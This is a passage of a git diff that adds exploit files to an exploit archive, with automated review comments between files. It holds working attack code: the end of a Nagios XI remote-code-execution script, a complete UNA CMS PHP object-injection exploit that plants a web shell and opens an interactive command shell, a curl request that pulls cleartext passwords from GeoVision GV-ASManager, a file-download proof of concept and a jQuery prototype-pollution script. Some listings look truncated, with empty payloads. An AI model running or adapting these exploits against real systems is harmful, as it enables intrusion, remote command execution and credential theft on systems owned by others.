"password": self.password, + "loginButton": "" + } + login = session.post(login_url, data=post_data, verify=not self.ignore_ssl) + if "Home Dashboard" in login.text: + print("Logged in!") + else: + print("Unable to login!") + self.upload(session) + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description='CVE-2019–15949 Nagiosxi authenticated Remote Code Execution') + parser.add_argument('-t', metavar='', help='Example: -t http://nagios.url/', required=True) + parser.add_argument('-b', metavar='', help="Example: -b /nagiosxi/", required=True) + parser.add_argument('-u', metavar='', help="Example: -a username", required=True) + parser.add_argument('-p', metavar='', help="Example: -p 'password'", required=True) + parser.add_argument('-lh', metavar='', help="Example: -lh 127.0.0.1", required=True) + parser.add_argument('-lp', metavar='', help="Example: -lp 1337", required=True) + parser.add_argument('-k', action='store_true', help="Ignore SSL certificate verification") + args = parser.parse_args() + + + urllib3.disable_warnings() + + try: + print('CVE-2019-15949 Nagiosxi authenticated Remote Code Execution') + Nagiosxi(args.t, args.b, args.u, args.p, args.lh, args.lp, args.k) + except KeyboardInterrupt: + print("\nBye Bye!") + exit() \ No newline at end of file diff --git a/exploits/multiple/webapps/52139.txt b/exploits/multiple/webapps/52139.txt new file mode 100644 index 000000000..53e3b8140 --- /dev/null +++ b/exploits/multiple/webapps/52139.txt 
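Review bot: In `login`, the `else` branch prints "Unable to login!" but execution falls through to `self.upload(session)` regardless, so a failed authentication still issues the follow-up requests with an unauthenticated session; the branch needs a `return` (or `sys.exit(1)`) after the message. `nsp[0]` in both `login` and `upload` raises an uncaught `IndexError` whenever the `re.findall` pattern does not match (a different page layout, a redirect), which would be clearer as an explicit check with its own message. `urllib3.disable_warnings()` is called unconditionally, even when `-k` is not given, so certificate problems are hidden in the default mode too; gate it on `args.k`. The usage line in the header comment has lost its placeholders (`-t https:/// -b //`), so it no longer shows the expected argument shapes.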
@@ -0,0 +1,125 @@ +# Exploit Title: UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability +# Author: Egidio Romano aka EgiX +# Software link.......: https://unacms.com + + +[-] Software Links: +https://unacms.com +https://github.com/unacms/una + +[-] Affected Versions: +All versions from 9.0.0-RC1 to 14.0.0-RC4. + +[-] Vulnerability Description: +The vulnerability is located in the +/template/scripts/BxBaseMenuSetAclLevel.php script. Specifically, +within the BxBaseMenuSetAclLevel::getCode() method. When calling this +method, user input passed through the "profile_id" POST parameter is +not properly sanitized before being used in a call to the +unserialize() PHP function. This can be exploited by remote, +unauthenticated attackers to inject arbitrary PHP objects into the +application scope, allowing them to perform a variety of attacks, such +as writing and executing arbitrary PHP code. + +\n"; + print "\nExample....: php $argv[0] http://localhost/una/"; + print "\nExample....: php $argv[0] https://unacms.com/\n\n"; + die(); +} + +define('ON_APACHE', true); +define('SH_PATH', ON_APACHE ? 
'./cache_public/sh.phtml' : './cache_public/sh.php'); + +class GuzzleHttp_Cookie_SetCookie +{ + private $data = ['Expires' => '', 'Value' => '']; +} + +class GuzzleHttp_Cookie_FileCookieJar +{ + private $cookies, $filename = SH_PATH, $storeSessionCookies = true; + + function __construct() + { + $this->cookies = [new GuzzleHttp_Cookie_SetCookie]; + } +} + +$url = $argv[1]; +$ch = curl_init(); + +$chain = serialize(new GuzzleHttp_Cookie_FileCookieJar); +$chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain); +$chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain); + +curl_setopt($ch, CURLOPT_URL, "{$url}menu.php"); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); +curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); +curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]); +curl_setopt($ch, CURLOPT_POSTFIELDS, "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=" . urlencode($chain)); + +print "\n[+] Performing PHP Object Injection"; + +curl_exec($ch); curl_close($ch); + +print "\n[+] Launching shell\n"; + +$ch = curl_init(); + +curl_setopt($ch, CURLOPT_URL, $url . SH_PATH); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); +curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); + +$phpcode = "print '____'; print shell_exec(base64_decode('%s')); print '____';"; + +while(1) +{ + print "\nuna-shell# "; + if (($cmd = trim(fgets(STDIN))) == "exit") break; + curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]); + preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n"); +} \ No newline at end of file diff --git a/exploits/multiple/webapps/52140.txt b/exploits/multiple/webapps/52140.txt new file mode 100644 index 000000000..02a8ae36d --- /dev/null +++ b/exploits/multiple/webapps/52140.txt 
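Review bot: The PHP listing starts mid-statement at `\n"; print "\nExample....:` — the opening `<?php` tag and the argument check that prints those usage examples are not in the hunk, and the header declares 125 added lines while far fewer are visible, so content was probably stripped in rendering; the stored file should be checked rather than trusting this view. `define('ON_APACHE', true)` is a hard-coded switch that the usage text never mentions; a one-line comment such as `// ON_APACHE selects the .phtml variant of SH_PATH; set false otherwise` would document it. The advisory also names affected versions but no fixed release, which readers need for remediation.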
@@ -0,0 +1,71 @@
+# Exploit Title: Jasmin Ransomware - (Authenticated) Arbitrary File Download
+# Google Dork: N/A
+# Date: 22-03-2025
+# Exploit Author: bRpsd cy[at]live.no
+# Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
+# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
+# Version: N/A
+# Tested on: MacOS local xampp
+
+
+Authentication can be easily bypassed due to SQL Injection as mentioned in:
+https://www.exploit-db.com/exploits/52091
+
+
+
+Vulnerable file:Web Panel/download_file.php
+Vulnerable parameter:file
+Vulnerable code:
+
+
+
+Proof of concept:
+
+http://localhost/Jasmin-Ransomware/Web Panel/download_file.php?file=database/db_conection.php
+Host: localhost
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br, zstd
+Connection: keep-alive
+Cookie: PHPSESSID=88e519f73f9013f560ed3f0514015d8c
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+
+GET: HTTP/1.1 200 OK
+Date: Sat, 22 Mar 2025 09:42:09 GMT
+Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1
+X-Powered-By: PHP/7.4.29
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: public
+Pragma: no-cache
+Content-Description: File Transfer
+Content-Disposition: attachment; filename=database/db_conection.php
+Content-Transfer-Encoding: binary
+Content-Length: 95
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/encoded;charset=UTF-8
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52141.txt b/exploits/multiple/webapps/52141.txt
new file mode 100644
index 000000000..dcdc08051
--- /dev/null
+++ b/exploits/multiple/webapps/52141.txt
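Review bot: The `Vulnerable code:` section is empty and the request block has no request line (the response block is labelled `GET: HTTP/1.1 200 OK`, which mixes the method into the status line); the hunk header declares 71 added lines but noticeably fewer are visible, so the code excerpt and request line were probably lost in rendering and should be verified against the stored file. `Vulnerable file:Web Panel/download_file.php` and `Vulnerable parameter:file` are missing the space after the colon. `Version: N/A` leaves the affected revision unspecified; naming the repository commit or release that was tested would let readers confirm whether a given deployment is affected.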
@@ -0,0 +1,72 @@
+# Exploit Title: jQuery Prototype Pollution & XSS Exploit (CVE-2019-11358 & CVE-2020-7656)
+# Google Dork: N/A
+# Date: 2025-02-13
+# Exploit Author: xOryus
+# Vendor Homepage: https://jquery.com
+# Software Link: https://code.jquery.com/jquery-3.3.1.min.js
+# Version: 3.3.1
+# Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112
+# CVE : CVE-2019-11358, CVE-2020-7656
+# Category: WebApps
+
+# Description:
+# This exploit abuses two vulnerabilities in jQuery:
+# - CVE-2020-7656: XSS via improper script handling
+# - CVE-2019-11358: Prototype Pollution leading to XSS
+# By injecting payloads into a vulnerable page using jQuery <3.4.X, attackers can execute arbitrary JavaScript in the victim's browser.
+#
+# Usage:
+# 1. Load this script in a page that includes jQuery 3.3.1
+# 2. Observe two XSS alerts via script injection and prototype pollution.
+
+# PoC (Proof of Concept):
+# ------------------------------------
+
+/*
+ * Exploit for CVE-2020-7656 and CVE-2019-11358
+ * Injects malicious JavaScript into a vulnerable page using jQuery <3.4.X
+ */
+
+COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12)
+
+// 1. Load vulnerable jQuery (version 3.3.1)
+const script = document.createElement('script');
+script.src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js";
+document.head.appendChild(script);
+
+// 2. Function to execute after jQuery is loaded
+script.onload = function() {
+ console.log("[+] Vulnerable jQuery loaded!");
+
+ // 3. Inject malicious content for XSS (CVE-2020-7656)
+ const maliciousContent = ""; // Space after
+ $('body').append(maliciousContent);
+ console.log("[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed.");
+
+ // 4. Exploit Prototype Pollution (CVE-2019-11358)
+ const defaultConfig = {
+ "backLink": "Go Back"
+ };
+
+ const maliciousParams = {
+ "__proto__": {
+ "backLink": ""
+ }
+ };
+
+ // 5. Merge objects using vulnerable $.extend
+ let config = $.extend(true, defaultConfig, maliciousParams);
+ console.log("[+] Prototype Pollution executed via $.extend().");
+
+ // 6. Create a container to inject malicious content
+ const container = document.createElement('div');
+ container.id = 'backLinkContainer';
+ document.body.appendChild(container);
+
+ // 7. Inject malicious content into the DOM
+ $('#backLinkContainer').html(config.backLink);
+ console.log("[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed.");
+};
+
+// 8. Instruction message
+console.log("[*] Script injected. Waiting for jQuery to load...");
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52144.txt b/exploits/multiple/webapps/52144.txt
new file mode 100644
index 000000000..661e864f4
--- /dev/null
+++ b/exploits/multiple/webapps/52144.txt
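Review bot: Both payload strings are empty — `const maliciousContent = "";` (with the dangling `// Space after` comment) and `"backLink": ""` in `maliciousParams` — so steps 3 and 7 append nothing and no alert can fire; the header declares 72 added lines while fewer are visible, which suggests the markup was stripped in rendering, but the stored file should be checked. The attribution of CVE-2020-7656 to jQuery 3.3.1 also looks doubtful: that CVE is recorded against the `load()` method in jQuery before 1.9.0, and nothing in this script calls `load()`, so CVE-2019-11358 (`$.extend` deep merge, fixed in 3.4.0) is the only issue the code actually exercises; the `Version:` and CVE header lines should be reconciled with that. `$.extend(true, defaultConfig, maliciousParams)` additionally mutates `defaultConfig` in place, so `config` is the same object; a short comment noting this would avoid surprising readers.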
@@ -0,0 +1,46 @@
+# Exploit Title: Information Disclosure in GeoVision GV-ASManager
+# Google Dork: inurl:"ASWeb/Login"
+# Date: 02-FEB-2025
+# Exploit Author: Giorgi Dograshvili [DRAGOWN]
+# Vendor Homepage: https://www.geovision.com.tw/
+# Software Link: https://www.geovision.com.tw/download/product/
+# Version: 6.1.0.0 or less
+# Tested on: Windows 10 | Kali Linux
+# CVE : CVE-2024-56902
+# PoC: https://github.com/DRAGOWN/CVE-2024-56902
+
+
+Information disclosure vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.
+
+Requirements
+To perform successful attack an attacker requires:
+- GeoVision ASManager version 6.1.0.0 or less
+- Network access to the GV-ASManager web application (there are cases when there are public access)
+- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: )
+
+Impact
+The vulnerability can be leveraged to perform the following unauthorized actions:
+A low privilege account is able to:
+- Enumerate user accounts
+- Retrieve cleartext password of any account in GV-ASManager.
+After reusing the retrieved password, an attacker will be able to:
+- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
+- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
+- Disrupt and disconnect services such as monitoring cameras, access controls.
+- Clone and duplicate access control data for further attack scenarios.
+- Reusing retrieved password in other digital assets of the organization.
+
+cURL script:
+
+curl --path-as-is -i -s -k -X $'POST' \
+ -H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: */*' -H $'Origin: https://192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \
+ -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
+ --data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \
+ $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'
+
+
+After a successful attack, you will get access to:
+- ASWeb - Access & Security Management
+- TAWeb - Time and Attendance Management
+- VMWeb - Visitor Management
+- ASManager - Access & Security Management software in OS
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9245b6df5..047d7616f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
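Review bot: The `Origin: https://192.168.50.129` header keeps a lab address while `Host` and the URL use the `[SET-TARGET]` placeholder; it should use the same placeholder so the command is consistent and no test-environment address leaks into the advisory. Setting `-H $'Content-Length: 41'` by hand is fragile: curl computes that header from `--data-binary`, and a hand-set value becomes wrong as soon as the body is edited, so it is better dropped. The advisory states `6.1.0.0 or less` but names no fixed release or vendor advisory; a remediation line would help readers confirm they are patched.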
@@ -11031,6 +11031,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35729,exploits/multiple/remote/35729.txt,"Imperva SecureSphere - SQL Query Filter Security Bypass",2011-05-09,@drk1wi,remote,multiple,,2011-05-09,2015-01-08,1,,,,,,https://www.securityfocus.com/bid/47780/info
 39455,exploits/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,remote,multiple,,2016-02-18,2016-02-18,0,CVE-2015-2080,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php
 46342,exploits/multiple/remote/46342.py,"Indusoft Web Studio 8.1 SP2 - Remote Code Execution",2019-02-11,"Jacob Baines",remote,multiple,,2019-02-11,2019-02-12,0,CVE-2019-6545;CVE-2019-6543,,,,,
+52142,exploits/multiple/remote/52142.py,"InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation",2025-04-08,"Andrea Pasin",remote,multiple,,2025-04-08,2025-04-08,0,CVE-2024-30896,,,,,
 30973,exploits/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution",2008-01-02,"Rich Cannings",remote,multiple,,2008-01-02,2014-01-16,1,CVE-2008-6060;OSVDB-56437,,,,,https://www.securityfocus.com/bid/27109/info
 21942,exploits/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",remote,multiple,,2002-10-15,2012-10-13,1,CVE-2002-1910;OSVDB-59780,,,,,https://www.securityfocus.com/bid/5970/info
 20468,exploits/multiple/remote/20468.txt,"Inktomi Search Software 3.0 - Information Disclosure",2000-12-05,"china nsl",remote,multiple,,2000-12-05,2012-08-13,1,OSVDB-88577,,,,,https://www.securityfocus.com/bid/2062/info
@@ -11486,6 +11487,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,,2008-05-08,2014-02-19,1,CVE-2008-2162;OSVDB-45017,,,,,https://www.securityfocus.com/bid/29107/info
 24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,remote,multiple,,2013-01-24,2013-01-24,1,CVE-2013-1359;OSVDB-89347,"Metasploit Framework (MSF)",,,,
 21453,exploits/multiple/remote/21453.txt,"SonicWALL SOHO3 6.3 - Content Blocking Script Injection",2002-05-17,"E M",remote,multiple,,2002-05-17,2012-09-22,1,CVE-2002-2341;OSVDB-4408,,,,,https://www.securityfocus.com/bid/4755/info
+52143,exploits/multiple/remote/52143.py,"Sony XAV-AX5500 1.13 - Firmware Update Validation Remote Code Execution (RCE)",2025-04-08,lkushinada,remote,multiple,,2025-04-08,2025-04-08,0,CVE-2024-23922,,,,,
 22509,exploits/multiple/remote/22509.txt,"Sophos Products - Multiple Vulnerabilities",2012-11-05,"Tavis Ormandy",remote,multiple,,2012-11-05,2012-11-05,1,OSVDB-87063;OSVDB-87062;OSVDB-87061;OSVDB-87060;OSVDB-87059;OSVDB-87058;OSVDB-87057;OSVDB-87056,,,,,
 48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple,,2020-06-15,2020-06-15,0,CVE-2020-12712,,,,,
 50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",2022-06-14,Altelus,remote,multiple,,2022-06-14,2022-06-14,0,CVE-2022-23642,,,,,
@@ -11926,6 +11928,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
 50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
 37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
+52144,exploits/multiple/webapps/52144.txt,"GeoVision GV-ASManager 6.1.0.0 - Information Disclosure",2025-04-08,"Giorgi Dograshvili",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2024-56902,,,,,
 50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,,2021-08-05,2021-08-05,0,,,,,,
 47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,,2019-09-23,2019-09-23,0,CVE-2019-16679,,,,http://www.exploit-db.comgila-1.10.9.zip,
 49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,,2021-02-18,2021-06-14,0,,,,,,
@@ -11997,6 +12000,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49372,exploits/multiple/webapps/49372.txt,"IPeakCMS 3.5 - Boolean-based blind SQLi",2021-01-06,MoeAlBarbari,webapps,multiple,,2021-01-06,2021-01-06,0,CVE-2021-3018,,,,,
 50490,exploits/multiple/webapps/50490.txt,"Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)",2021-11-03,Vulnerability-Lab,webapps,multiple,,2021-11-03,2021-11-03,0,,,,,,
 52062,exploits/multiple/webapps/52062.py,"Ivanti vADC 9.9 - Authentication Bypass",2024-08-04,ohnoisploited,webapps,multiple,,2024-08-04,2024-08-04,0,,,,,,
+52140,exploits/multiple/webapps/52140.txt,"Jasmin Ransomware - Arbitrary File Download (Authenticated)",2025-04-08,bRpsd,webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
 44623,exploits/multiple/webapps/44623.txt,"JasperReports - (Authenticated) File Read",2018-05-03,"Hector Monsegur",webapps,multiple,,2018-05-15,2018-05-15,0,CVE-2018-5430,,,,,https://rhinosecuritylabs.com/application-security/authenticated-file-read-vulnerability-in-jasperreports/
 36575,exploits/multiple/webapps/36575.py,"JBoss AS 3/4/5/6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",webapps,multiple,,2015-04-13,2015-04-13,0,OSVDB-120064,,,,,
 35911,exploits/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117568;OSVDB-117567;CVE-2015-1478;CVE-2015-1477,,,,,
@@ -12018,6 +12022,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48147,exploits/multiple/webapps/48147.txt,"Joplin Desktop 1.0.184 - Cross-Site Scripting",2020-03-02,"Javier Olmedo",webapps,multiple,,2020-03-02,2020-03-02,0,CVE-2020-9038,,,,,
 49767,exploits/multiple/webapps/49767.txt,"jQuery 1.0.3 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,,2021-04-14,2021-04-14,0,CVE-2020-11023,,,,,
 49766,exploits/multiple/webapps/49766.txt,"jQuery 1.2 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,,2021-04-14,2021-04-14,0,CVE-2020-11022,,,,,
+52141,exploits/multiple/webapps/52141.txt,"jQuery 3.3.1 - Prototype Pollution & XSS Exploit",2025-04-08,xOryus,webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2020-7656;CVE-2019-11358,,,,,
 11218,exploits/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Arbitrary File Upload",2010-01-21,k4cp3r/Ablus,webapps,multiple,,2010-01-20,,1,,,,,http://www.exploit-db.comjquery.uploadify-v2.1.0.zip,
 38641,exploits/multiple/webapps/38641.rb,"JSSE - SKIP-TLS",2015-11-05,"Ramon de C Valle",webapps,multiple,,2015-11-05,2015-11-05,0,CVE-2014-6593;OSVDB-117238,,,,,
 38424,exploits/multiple/webapps/38424.txt,"Kallithea 0.2.9 - 'came_from' HTTP Response Splitting",2015-10-08,LiquidWorm,webapps,multiple,,2015-10-11,2015-10-11,0,CVE-2015-5285,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php
@@ -12112,6 +12117,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,,
 49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
 52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-03,0,,,,,,
+52138,exploits/multiple/webapps/52138.txt,"Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)",2025-04-08,"Calil Khalil",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2019-15949,,,,,
 51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,,
 41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"SQL Injection (SQLi)",,,,
 41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"Cross-Site Scripting (XSS)",,,,
@@ -12359,6 +12365,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44350,exploits/multiple/webapps/44350.py,"TwonkyMedia Server 7.0.11-8.5 - Directory Traversal",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7171,,,,http://www.exploit-db.comTwonkyServer-8.5.exe,
 44351,exploits/multiple/webapps/44351.txt,"TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7203,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comTwonkyServer-8.5.exe,
 47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80,2019-08-01,2019-08-02,0,,"Cross-Site Scripting (XSS)",,,,
+52139,exploits/multiple/webapps/52139.txt,"UNA CMS 14.0.0-RC - PHP Object Injection",2025-04-08,"Egidio Romano",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
 49150,exploits/multiple/webapps/49150.txt,"Under Construction Page with CPanel 1.0 - SQL injection",2020-12-02,"Mayur Parmar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
 47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,,
 43362,exploits/multiple/webapps/43362.md,"vBulletin 5.x - 'cacheTemplates' Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,,2017-12-18,2019-10-01,0,CVE-2017-17672,,,,,https://blogs.securiteam.com/index.php/archives/3573
@@ -12414,6 +12421,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41692,exploits/multiple/webapps/41692.rb,"WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - File Upload (Metasploit)",2016-05-04,Metasploit,webapps,multiple,,2017-03-23,2017-03-23,1,CVE-2016-1209;OSVDB-8485,,,,,https://github.com/rapid7/metasploit-framework/blob/8cd9a9b6708c4a175d5175879169188dc8014a51/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb
 49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
 33937,exploits/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,webapps,multiple,,2010-05-05,2016-09-26,1,,,,,,https://www.securityfocus.com/bid/39926/info
+52137,exploits/multiple/webapps/52137.txt,"WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation",2025-04-08,"Al Baradi Joy",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
 37573,exploits/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",webapps,multiple,,2012-08-06,2015-07-11,1,,,,,,https://www.securityfocus.com/bid/54812/info
 40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php
 40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php